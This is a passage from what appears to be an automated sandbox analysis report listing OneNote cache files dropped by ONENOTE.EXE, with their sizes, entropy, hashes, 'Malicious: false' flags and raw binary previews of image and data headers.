Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.477824828909453
Encrypted:	false
SSDEEP:	48:IsUi3lfHoniXvtSEEbz1cXic9gkj4VrdMrvSdXEzk9kgHyA58U5Q5JkogDw:IsiniXvVEyXP9gkARM6w
MD5:	89578FE8DECCDD745C0DD464AD8AA24A
SHA1:	C25795E6DF4F3BD135C2B1CEDA7685A2CEA14E27
SHA-256:	9DAC548A7734C0C6F048884453C84ED9C6B7E6714B5121B376BF15FFF1F49399
SHA-512:	DD72ACF8EFBE9A84AC0B8DD67184A74062E97DC1A68BCBDE817BAEAEE55E248AF8759D9B29BA58CF2FCFAF6BEDCF785C538EFE06E4E431A67C5ABC2F798A4922
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ..U.......U..#]..z...<...U..#]..z...<...U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............\|^r...={gb........N...^................~...n_L.=}..c`.........f........................................I.qk..B.....LZ.............\|^r...={gb.............\|^*r...={gb...............U.......U.......U...........................................Uj......UT.]....U.......U..B....UH......U..B....U..>.)..U..J...................;........4...4...4.."................U...U...U..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4...........U.......U....#..U............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.362949092859627
Encrypted:	false
SSDEEP:	48:bsS3hx4DuF6xqwttUEQ24XB9wTj4ZrdMrmNWdXFI4uVnq6pr9Qdg:bsiX6xqwtWEWXB9wTcRMFctQd
MD5:	E5253662A0B8C2476C2D3834713E7299
SHA1:	083DA724735D11F7F270D99FBCFDBADF31298598
SHA-256:	55ECC7198520B61636D83AD7FA21E70BAD278D0BA3D1BE267F50644B30CA6A72
SHA-512:	C704A0D23A6D4A8FCC96F4770B56EA30733ED4DAB18B1D1A64E5123A82F3C674A5663302DDA2448AC71DA2644050702A8CDD746903AC8D741ACD42CA68998756
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ..@.......@..@{......m3..@..@{......m3..@..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............L..h..5.%...5f....N...^..................`B\|.J..m..n.F........H........................................I.qk..B.....LZ.............L..h..5.%...5f.........L..h..5.%...5f...........@.......@.......@...........................................@j......@T.^....@.......@..B....@..C....@..>....@..\|....@ .3...................;........4...4...4.."................@...@...@..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4...........@.......@....#..@............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.376306786910849
Encrypted:	false
SSDEEP:	96:4sMYQOGBzkEsAow3XrE9wQqjKRMPEm5KwdmO8P:4sMYQOGBtsAow3XA9wQ6KRMPEmYwdmHP
MD5:	6585F53C13CF299A7AA3746B052A6581
SHA1:	7D3D5D57B5C459DF55D89AF208C7FEECC8534573
SHA-256:	30427DC11CCF56250E536F8A593F4BE1A5E15856083FC392E7A7DF5CA4438C02
SHA-512:	5E5FAE4A1840923C87A03A01DE4F84D5BFDAA29B49E43255D6CAE3184FD57F39643EF558E04881AC0AD55032A8E455EEB70D4D2D9E36ED43AE412D285A05BD6B
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..........t....K.......t....K........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............P=.9..S.3..~o.pm....N...^................:-..p.H.&...#p........f........................................I.qk..B.....LZ............P=.9..S.3..~o.pm........P=.9..S.3..~o.pm....................................................................j......T.]............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4......................#*..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.297796387337245
Encrypted:	false
SSDEEP:	48:Wsbic0enCMSw0a3fDtr48HfE2JlZIBX59RsjpyxrdMrlhZqFXf8Jndj0mzYg:Wsi5rGfDR48/E2qX59RKsRMtqWY
MD5:	EC6031FE9DD687870218C548414310A5
SHA1:	2288E69F018A07938B900E516423DB2FD2374C32
SHA-256:	E81F7C73AB5C7117E6DD057021F6541277E9A8F060EC8D9AE30B1CCB6ED11BC4
SHA-512:	9610DBF555014AB3101EE893FFBDFAAE464060CA5F73C7E36463A855C5665A2AD661D7C4613FB9503E823CC674CEAD8B18AB262EBA8F5303F1BCD97148C93164
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.............;...kkY.\.B.....;...kkY.\.B.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............'.w......HB".....N...^.................n...LO...UUG.z........f........................................I.qk..B.....LZ..............'.w......HB"...........'.w......HB".........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.341784257816472
Encrypted:	false
SSDEEP:	96:IsRQMNEnp/DyEQeXYx9JYlboRMReZ+M9d1H6:IsRQM6nprQeXw9JqoRMIZ+M9d1H
MD5:	21447CC838C9D370344AE808E2785875
SHA1:	9222AF1CD150029F8FDFE5F2A676BC7E0E58A89F
SHA-256:	0BB7494043E0EAA6684B28E851FE73D1F5D4E57C915118E37812AE0A99E37894
SHA-512:	CE6A5EA5831E501F9409092C493B2E6B6EC9E74E2B9AED16C34AE5AABCA64381D72EF701068348059C327650C412AF676BF958C033EA76C0E86B8DD372025907
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.K'......K'.v...%K.@..?.K'.v...%K.@..?.K'..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............R...c..q.5. ;X....N...^................Y..dC..j.............f........................................I.qk..B.....LZ..............R...c..q.5. ;X..........R...c..q.5. ;X..........K'......K'......K'..........................................K'j.....K'T.]...K'......K'..B...K'H.....K'..B...K'..>.).K'..J...................;........4...4...4.."...............K'..K'..K'..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........K'......K'....#.K'............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.475181176955499
Encrypted:	false
SSDEEP:	96:y8scFb6HiEOELu6Xr9B6kRMrUiEFdFkFkFkFdFj2FeFg:y8so6HFbLu6Xr9B6kRMrUi4
MD5:	9B35B43C3A1D16B7DF32CC866ADCE452
SHA1:	8D98A556C267DD78894948BC9924584B2E0E4C9A
SHA-256:	E693A58677C38EFC044AED8992B0024B342C6268738811264EA4C4CC7F87DDB2
SHA-512:	60181F6B1FA9CE43878382A4310DA9C72E089080049631E3005D57669124808423B0AA3523D2ECCC4A3767000D149C4266C2C35934557AB880E504757A258457
Malicious:	false
Preview:	2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ.h}......h}\.:4. .....h}\.:4. .....h}..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................Y..............N...^....................9L...F..i........f........................................I.qk..B.....LZ...............Y.....................*Y....................h}......h}......h}..........................................h}j.....h}T.]...h}......h}..B...h}H.....h}..B...h}..>.).h}..J...................;........4...4...4.."...............h}..h}..h}..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........h}......h}....#.h}............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.353943418447345
Encrypted:	false
SSDEEP:	48:GBsEqzPPbziPteEEEXDJuaXC691Hs3mpylrdMrtGKFX8aBCY6vfc+/IwGBanke:GBsEcPviPEEXbXC691HXARMzj68+/IW
MD5:	1E2B6F30EA0CCF0E7D6EDF3BAC52B107
SHA1:	B1FA76B05B1EE9205BA863C7AADFB99F21CC526A
SHA-256:	F3BDABABF4DA05FBD3E4740F376A573468AAA6144051DF8BA90454CE08AD89FD
SHA-512:	443235FAAA07B44ABB32DA47934A8B4FE8303AF7AA57C9113EBF558F0ACBB87639D83D16094C7571DF8B8CD3D373A05146C598BE1FB4D810F53139CC7F0A05AF
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZA.;.....A.;2#...?.&.V...A.;2#...?.&.V...A.;..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............mC.q..%n..1B......N...^.................X..~.C..:.H}J.........f........................................I.qk..B.....LZ............mC.q..%n..1B..........mC.q..%n..1B...........A.;.....A.;.....A.;.........................................A.;j....A.;T.]..A.;.....A.;..B..A.;H....A.;..B..A.;..>.)A.;..J...................;........4...4...4.."..............A.;.A.;.A.;..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........A.;.....A.;....#A.;............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.367938389716958
Encrypted:	false
SSDEEP:	48:osxc4TiIMtucEJtXLcX0oc9dsGpylrdMrj1tFXsQF9tFN:osLiIMdE8X0d9dngRMJtBX
MD5:	3ABA404A41D887E6EF08B33F4BAF6532
SHA1:	35B347558DFA5775A2AB1001E79A28E53A6B74EB
SHA-256:	98FA3D4091E36898B0636431B474B1E93923B60E3B0A5D80C68B4CB05BA4032E
SHA-512:	D7F2FE50F55189C7637E7457B4A355AC21FDBD7A41F5C86CF5EBDE64254052D517658642A3B082A47801624B2D47F76C3DB1CBEC52E4A086D736C7B44C91F49E
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..U.......UT..2..2.\ ...UT..2..2.\ ...U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............<..@.=\|..S.b.....N...^.................9....D..Ln.:n........f........................................I.qk..B.....LZ..............<..@.=\|..S.b...........<..@.=\|..S.b............U.......U.......U...........................................Uj......UT.]....U.......U..B....UH......U..B....U..>.)..U..J...................;........4...4...4.."................U...U...U..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........U.......U....#..U............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.345081105783185
Encrypted:	false
SSDEEP:	48:asOtarMiZtpatfFxwEPA8ENXT2a99sqpylrdMrzhkCRzFXIwxS73QIg:asnMiTpaCEPkXJ99zIRMzCezbozQI
MD5:	8F4B8048B32F1FB45FF805FE47098C5A
SHA1:	E0FFD4681379FA3085A1454647BA3E61F08529C0
SHA-256:	00ADE2A9920C3BD94B52E1699E318CD8DCD2E2B7D92CE9D205A8A1C5BF885F62
SHA-512:	EFBF7DE72748F7514A9ACE6E0C8149926D4FBD057178A79B19D6BB877E2BCC1F17AA96EBE0E3312E3BBBCD43CF91734BB14634A85F383EFB81873ECEB06CC4EF
Malicious:	false
